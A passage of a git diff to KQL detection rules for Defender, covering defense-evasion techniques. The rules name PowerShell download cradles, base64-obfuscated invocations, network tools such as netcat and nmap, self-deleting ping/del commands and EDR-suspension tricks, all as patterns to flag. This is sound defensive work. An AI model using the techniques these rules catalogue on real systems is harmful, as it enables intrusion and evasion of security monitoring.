 | where ProcessCommandLine contains "IAAtAGIAeABvAHIAIAAwAHgA" or ProcessCommandLine contains "AALQBiAHgAbwByACAAMAB4A" or ProcessCommandLine contains "gAC0AYgB4AG8AcgAgADAAeA" or ProcessCommandLine contains "AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg" or ProcessCommandLine contains "AuAEkAbgB2AG8AawBlACgAKQAgAHwAI" or ProcessCommandLine contains "ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AJwAgAC0AZgAg"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql b/KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql
index 475dce6c..fb7f4e3a 100644
--- a/KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql
+++ b/KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Package Installed - Linux
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-03
-// Level: medium
-// Description: Detects installation of suspicious packages using system installation utilities
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1553.004
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Suspicious Package Installed - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-03
+// Level: medium
+// Description: Detects installation of suspicious packages using system installation utilities
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "install" and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")) or ((ProcessCommandLine contains "--install" or ProcessCommandLine contains "-i") and FolderPath endswith "/dpkg") or (ProcessCommandLine contains "-i" and FolderPath endswith "/rpm") or ((ProcessCommandLine contains "localinstall" or ProcessCommandLine contains "install") and FolderPath endswith "/yum")) and (ProcessCommandLine contains "nmap" or ProcessCommandLine contains " nc" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "wireshark" or ProcessCommandLine contains "tshark" or ProcessCommandLine contains "openconnect" or ProcessCommandLine contains "proxychains")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql b/KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql
index fd23deca..382f4dff 100644
--- a/KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql
+++ b/KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Parent Double Extension File Execution
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-06
-// Level: high
-// Description: Detect execution of suspicious double extension files in ParentCommandLine
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036.007
-
-DeviceProcessEvents
+// Title: Suspicious Parent Double Extension File Execution
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-06
+// Level: high
+// Description: Detect execution of suspicious double extension files in ParentCommandLine
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.007
+
+DeviceProcessEvents
 | where (InitiatingProcessFolderPath endswith ".doc.lnk" or InitiatingProcessFolderPath endswith ".docx.lnk" or InitiatingProcessFolderPath endswith ".xls.lnk" or InitiatingProcessFolderPath endswith ".xlsx.lnk" or InitiatingProcessFolderPath endswith ".ppt.lnk" or InitiatingProcessFolderPath endswith ".pptx.lnk" or InitiatingProcessFolderPath endswith ".rtf.lnk" or InitiatingProcessFolderPath endswith ".pdf.lnk" or InitiatingProcessFolderPath endswith ".txt.lnk" or InitiatingProcessFolderPath endswith ".doc.js" or InitiatingProcessFolderPath endswith ".docx.js" or InitiatingProcessFolderPath endswith ".xls.js" or InitiatingProcessFolderPath endswith ".xlsx.js" or InitiatingProcessFolderPath endswith ".ppt.js" or InitiatingProcessFolderPath endswith ".pptx.js" or InitiatingProcessFolderPath endswith ".rtf.js" or InitiatingProcessFolderPath endswith ".pdf.js" or InitiatingProcessFolderPath endswith ".txt.js") or (InitiatingProcessCommandLine contains ".doc.lnk" or InitiatingProcessCommandLine contains ".docx.lnk" or InitiatingProcessCommandLine contains ".xls.lnk" or InitiatingProcessCommandLine contains ".xlsx.lnk" or InitiatingProcessCommandLine contains ".ppt.lnk" or InitiatingProcessCommandLine contains ".pptx.lnk" or InitiatingProcessCommandLine contains ".rtf.lnk" or InitiatingProcessCommandLine contains ".pdf.lnk" or InitiatingProcessCommandLine contains ".txt.lnk" or InitiatingProcessCommandLine contains ".doc.js" or InitiatingProcessCommandLine contains ".docx.js" or InitiatingProcessCommandLine contains ".xls.js" or InitiatingProcessCommandLine contains ".xlsx.js" or InitiatingProcessCommandLine contains ".ppt.js" or InitiatingProcessCommandLine contains ".pptx.js" or InitiatingProcessCommandLine contains ".rtf.js" or InitiatingProcessCommandLine contains ".pdf.js" or InitiatingProcessCommandLine contains ".txt.js")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql
index d896dce7..b539e5e4 100644
--- a/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql
+++ b/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Path In Keyboard Layout IME File Registry Value
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-11-21
-// Level: high
-// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
-// Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
-// IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-
-DeviceRegistryEvents
+// Title: Suspicious Path In Keyboard Layout IME File Registry Value
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-11-21
+// Level: high
+// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
+// Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
+// IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\Control\\Keyboard Layouts*" and RegistryKey contains "Ime File") and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql b/KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql
index 369e2266..9498dc5e 100644
--- a/KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql
+++ b/KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Ping/Del Command Combination
-// Author: Ilya Krestinichev
-// Date: 2022-11-03
-// Level: high
-// Description: Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.004
-
-DeviceProcessEvents
+// Title: Suspicious Ping/Del Command Combination
+// Author: Ilya Krestinichev
+// Date: 2022-11-03
+// Level: high
+// Description: Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "ping" and ProcessCommandLine contains "del ") and (ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f " or ProcessCommandLine contains " -q " or ProcessCommandLine contains " /q " or ProcessCommandLine contains " –q " or ProcessCommandLine contains " —q " or ProcessCommandLine contains " ―q ") and ProcessCommandLine contains "Nul"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql b/KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql
index 510eb368..b47137d6 100644
--- a/KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql
+++ b/KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Powercfg Execution To Change Lock Screen Timeout
-// Author: frack113
-// Date: 2022-11-18
-// Level: medium
-// Description: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Suspicious Powercfg Execution To Change Lock Screen Timeout
+// Author: frack113
+// Date: 2022-11-18
+// Level: medium
+// Description: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\powercfg.exe" or ProcessVersionInfoOriginalFileName =~ "PowerCfg.exe") and ((ProcessCommandLine contains "/setacvalueindex " and ProcessCommandLine contains "SCHEME_CURRENT" and ProcessCommandLine contains "SUB_VIDEO" and ProcessCommandLine contains "VIDEOCONLOCK") or (ProcessCommandLine contains "-change " and ProcessCommandLine contains "-standby-timeout-"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql b/KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql
index 17892898..821b70f6 100644
--- a/KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql
+++ b/KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious PowerShell Invocations - Specific - ProcessCreation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-05
-// Level: medium
-// Description: Detects suspicious PowerShell invocation command parameters
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Suspicious PowerShell Invocations - Specific - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-05
+// Level: medium
+// Description: Detects suspicious PowerShell invocation command parameters
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "[Convert]::FromBase64String") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-ep" and ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-Enc") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-noni" and ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object") or (ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object" and ProcessCommandLine contains "Net.WebClient" and ProcessCommandLine contains ".Download") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "\\software\\") or (ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-noprofile" and ProcessCommandLine contains "-windowstyle" and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "new-object" and ProcessCommandLine contains "system.net.webclient" and ProcessCommandLine contains ".download")) and (not((ProcessCommandLine contains "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1" or ProcessCommandLine contains "Write-ChocolateyWarning")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql b/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql
index 1d716247..bca7f601 100644
--- a/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql
+++ b/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious Process Masquerading As SvcHost.EXE
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2024-08-07
-// Level: high
-// Description: Detects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location.
-// Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036.005
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Suspicious Process Masquerading As SvcHost.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-08-07
+// Level: high
+// Description: Detects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location.
+// Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where FolderPath endswith "\\svchost.exe" and (not(((FolderPath in~ ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe")) or ProcessVersionInfoOriginalFileName =~ "svchost.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_process_parents.kql b/KQL/rules/Defense Evasion/suspicious_process_parents.kql
index 1eca60d2..0ec096c9 100644
--- a/KQL/rules/Defense Evasion/suspicious_process_parents.kql
+++ b/KQL/rules/Defense Evasion/suspicious_process_parents.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Process Parents
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-03-21
-// Level: high
-// Description: Detects suspicious parent processes that should not have any children or should only have a single possible child program
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036
-
-DeviceProcessEvents
+// Title: Suspicious Process Parents
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-21
+// Level: high
+// Description: Detects suspicious parent processes that should not have any children or should only have a single possible child program
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
 | where (InitiatingProcessFolderPath endswith "\\minesweeper.exe" or InitiatingProcessFolderPath endswith "\\winver.exe" or InitiatingProcessFolderPath endswith "\\bitsadmin.exe") or ((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\eventvwr.exe" or InitiatingProcessFolderPath endswith "\\calc.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe") and (not((isnull(FolderPath) or (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\mmc.exe" or FolderPath endswith "\\win32calc.exe" or FolderPath endswith "\\notepad.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_process_start_locations.kql b/KQL/rules/Defense Evasion/suspicious_process_start_locations.kql
index 22adc778..78980468 100644
--- a/KQL/rules/Defense Evasion/suspicious_process_start_locations.kql
+++ b/KQL/rules/Defense Evasion/suspicious_process_start_locations.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Process Start Locations
-// Author: juju4, Jonhnathan Ribeiro, oscd.community
-// Date: 2019-01-16
-// Level: medium
-// Description: Detects suspicious process run from unusual locations
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036, car.2013-05-002
-// False Positives:
-// - False positives depend on scripts and administrative tools used in the monitored environment
-
-DeviceProcessEvents
+// Title: Suspicious Process Start Locations
+// Author: juju4, Jonhnathan Ribeiro, oscd.community
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects suspicious process run from unusual locations
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, car.2013-05-002
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
 | where (FolderPath contains ":\\RECYCLER\\" or FolderPath contains ":\\SystemVolumeInformation\\") or (FolderPath startswith "C:\\Windows\\Tasks\\" or FolderPath startswith "C:\\Windows\\debug\\" or FolderPath startswith "C:\\Windows\\fonts\\" or FolderPath startswith "C:\\Windows\\help\\" or FolderPath startswith "C:\\Windows\\drivers\\" or FolderPath startswith "C:\\Windows\\addins\\" or FolderPath startswith "C:\\Windows\\cursors\\" or FolderPath startswith "C:\\Windows\\system32\\tasks\\")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql b/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql
index 9a592f94..966b5909 100644
--- a/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql
+++ b/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Process Suspension via WERFaultSecure through EDR-Freeze
-// Author: Jason (https://github.com/0xbcf)
-// Date: 2025-09-23
-// Level: high
-// Description: Detects attempts to freeze a process likely an EDR or an antimalware service process through EDR-Freeze that abuses the WerFaultSecure.exe process to suspend security software.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Legitimate usage of WerFaultSecure for debugging purposes
-
-DeviceProcessEvents
+// Title: Suspicious Process Suspension via WERFaultSecure through EDR-Freeze
+// Author: Jason (https://github.com/0xbcf)
+// Date: 2025-09-23
+// Level: high
+// Description: Detects attempts to freeze a process likely an EDR or an antimalware service process through EDR-Freeze that abuses the WerFaultSecure.exe process to suspend security software.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate usage of WerFaultSecure for debugging purposes
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " /h " and ProcessCommandLine contains " /pid " and ProcessCommandLine contains " /tid " and ProcessCommandLine contains " /encfile " and ProcessCommandLine contains " /cancel " and ProcessCommandLine contains " /type " and ProcessCommandLine contains " 268310") and (FolderPath endswith "\\WerFaultSecure.exe" or ProcessVersionInfoOriginalFileName =~ "WerFaultSecure.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql b/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql
index a85047d3..f299a847 100644
--- a/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql
+++ b/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious PROCEXP152.sys File Created In TMP
-// Author: xknow (@xknow_infosec), xorxes (@xor_xes)
-// Date: 2019-04-08
-// Level: medium
-// Description: Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.
-// This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.t1562.001, attack.defense-evasion
-// False Positives:
-// - Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it.
-
-DeviceFileEvents
+// Title: Suspicious PROCEXP152.sys File Created In TMP
+// Author: xknow (@xknow_infosec), xorxes (@xor_xes)
+// Date: 2019-04-08
+// Level: medium
+// Description: Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.
+// This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1562.001, attack.defense-evasion
+// False Positives:
+// - Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it.
+
+DeviceFileEvents
 | where (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "PROCEXP152.sys") and (not((InitiatingProcessFolderPath contains "\\procexp64.exe" or InitiatingProcessFolderPath contains "\\procexp.exe" or InitiatingProcessFolderPath contains "\\procmon64.exe" or InitiatingProcessFolderPath contains "\\procmon.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql b/KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql
index 44f055b4..fd3524e4 100644
--- a/KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql
+++ b/KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE
-// Author: Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
-// Date: 2020-05-25
-// Level: high
-// Description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.004
-
-DeviceProcessEvents
+// Title: Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE
+// Author: Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
+// Date: 2020-05-25
+// Level: high
+// Description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "allowedprogram") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "action=allow" and ProcessCommandLine contains "program=")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and (ProcessCommandLine contains ":\\$Recycle.bin\\" or ProcessCommandLine contains ":\\RECYCLER.BIN\\" or ProcessCommandLine contains ":\\RECYCLERS.BIN\\" or ProcessCommandLine contains ":\\SystemVolumeInformation\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Default\\" or ProcessCommandLine contains ":\\Users\\Desktop\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\addins\\" or ProcessCommandLine contains ":\\Windows\\cursors\\" or ProcessCommandLine contains ":\\Windows\\debug\\" or ProcessCommandLine contains ":\\Windows\\drivers\\" or ProcessCommandLine contains ":\\Windows\\fonts\\" or ProcessCommandLine contains ":\\Windows\\help\\" or ProcessCommandLine contains ":\\Windows\\system32\\tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Local Settings\\Temporary Internet Files\\" or ProcessCommandLine contains "\\Temporary Internet Files\\Content.Outlook\\" or ProcessCommandLine contains "%Public%\\" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql b/KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql
index e564fb1c..1ec6834d 100644
--- a/KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql
+++ b/KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Provlaunch.EXE Child Process
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-08
-// Level: high
-// Description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: Suspicious Provlaunch.EXE Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-08
+// Level: high
+// Description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\")) and InitiatingProcessFolderPath endswith "\\provlaunch.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql b/KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql
index c2b341e2..c1b2a5d7 100644
--- a/KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql
+++ b/KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious RASdial Activity
-// Author: juju4
-// Date: 2019-01-16
-// Level: medium
-// Description: Detects suspicious process related to rasdial.exe
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1059
-// False Positives:
-// - False positives depend on scripts and administrative tools used in the monitored environment
-
-DeviceProcessEvents
+// Title: Suspicious RASdial Activity
+// Author: juju4
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects suspicious process related to rasdial.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
 | where FolderPath endswith "rasdial.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql b/KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql
index 7a9488ad..81a23a9c 100644
--- a/KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql
+++ b/KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql
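Review bot: The query line `| where FolderPath endswith "rasdial.exe"` has no path separator in the suffix, so it also matches any binary whose name merely ends in `rasdial.exe` (for example `notrasdial.exe`), unlike the sibling rules in this batch that anchor on `"\\name.exe"`. The hunk itself only rewrites the header lines, so this is the unchanged detection logic rather than something the commit introduced. For consistency and to avoid the spurious suffix match I would change it to `| where FolderPath endswith "\\rasdial.exe"`.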
@@ -1,13 +1,13 @@
-// Title: Suspicious Recursive Takeown
